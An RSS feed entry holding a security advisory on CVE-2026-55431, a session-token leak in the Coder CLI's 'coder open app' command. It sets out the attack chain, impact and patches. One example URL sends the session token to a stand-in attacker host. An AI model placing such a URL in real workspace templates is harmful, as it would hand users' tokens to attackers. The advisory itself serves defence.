<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Cli-Exploitation - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/cli-exploitation/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Mon, 06 Jul 2026 21:10:28 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/cli-exploitation/feed.xml" rel="self" type="application/rss+xml"/><item><title>Coder `coder open app` Session Token Leakage Vulnerability (CVE-2026-55431)</title><link>https://feed.craftedsignal.io/briefs/2026-07-coder-session-token-leak/</link><pubDate>Mon, 06 Jul 2026 21:10:28 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-07-coder-session-token-leak/</guid><description>A high-severity vulnerability, CVE-2026-55431, in the Coder CLI's `coder open app` command allows malicious workspace template authors to exfiltrate user session tokens via crafted external app URLs, leading to full account impersonation.</description><content:encoded><![CDATA[<p>A high-severity vulnerability (CVE-2026-55431) has been identified in the <code>coder</code> CLI, specifically impacting the <code>coder open app</code> command. This flaw allows an attacker who controls the contents of a Coder workspace to define malicious external application URLs that embed a <code>$SESSION_TOKEN</code> placeholder. When a user executes <code>coder open app</code> against such a compromised workspace, the CLI erroneously replaces the placeholder with the user's active session token without validating the URL's scheme or host. This crafted URL, now containing the sensitive session token, is then opened by the operating system's default handler (typically a web browser), inadvertently sending the token to an attacker-controlled domain. This vulnerability facilitates full account impersonation for the duration of the session token's validity and can also be used to invoke arbitrary local URI scheme handlers. The issue affects Coder versions prior to 2.34.2, 2.33.8, 2.32.7, and 2.29.17.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Compromise</strong>: An attacker gains control over the definition of an external application within a Coder workspace, typically by authoring or modifying a malicious workspace template.</li>
<li><strong>Malicious Configuration</strong>: The attacker configures the external application's URL to include the <code>$SESSION_TOKEN</code> placeholder and points it to an attacker-controlled domain (e.g., <code>https://attacker.example/?t=$SESSION_TOKEN</code>).</li>
<li><strong>User Interaction</strong>: A legitimate Coder user, interacting with their environment, invokes the <code>coder open app</code> command, targeting the compromised or maliciously configured workspace.</li>
<li><strong>Token Substitution</strong>: The vulnerable <code>coder</code> CLI, failing to validate the URL's scheme or host, replaces the <code>$SESSION_TOKEN</code> placeholder with the user's active session token.</li>
<li><strong>External Launch</strong>: The CLI then hands off the maliciously crafted URL, now containing the session token, to the operating system's default handler (e.g., a web browser) for execution.</li>
<li><strong>Data Exfiltration</strong>: The handling application (e.g., web browser) performs a GET request to the attacker-controlled server (<code>attacker.example</code>), inadvertently transmitting the victim's session token as a URL parameter.</li>
<li><strong>Account Impersonation</strong>: The attacker captures the exfiltrated session token and uses it to gain unauthorized, full access to the victim's Coder account, allowing for complete impersonation and control.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This vulnerability poses a significant risk as it enables full account impersonation, granting attackers unauthorized access to a victim's Coder account and potentially any resources accessible through that account. If exploited, an attacker can perform any action the compromised user is authorized to do, including accessing code, deploying resources, or modifying configurations within the Coder environment. The vulnerability also carries the risk of invoking arbitrary local URI scheme handlers, which could lead to further compromise or execution of malicious code on the victim's machine. The primary target is any user who interacts with potentially untrusted Coder workspaces using the <code>coder open app</code> command.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li><strong>Patch CVE-2026-55431</strong> immediately by upgrading Coder CLI to version <code>v2.34.2</code>, <code>v2.33.8</code>, <code>v2.32.7</code>, <code>v2.29.17</code>, or newer, as specified in the patches section.</li>
<li><strong>Implement User Awareness Training</strong>: Educate users to avoid running the <code>coder open app</code> command for workspaces with unknown or untrusted origins as per the workaround.</li>
<li><strong>Monitor Network Traffic</strong>: Block outbound connections to the domain <code>attacker.example</code> at the network perimeter.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>credential-access</category><category>vulnerability</category><category>cli-exploitation</category><category>token-leakage</category><category>coder</category></item></channel></rss>